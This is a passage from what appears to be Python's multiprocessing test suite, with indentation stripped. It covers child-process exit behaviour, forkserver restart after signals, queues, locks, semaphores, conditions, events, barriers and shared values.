@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
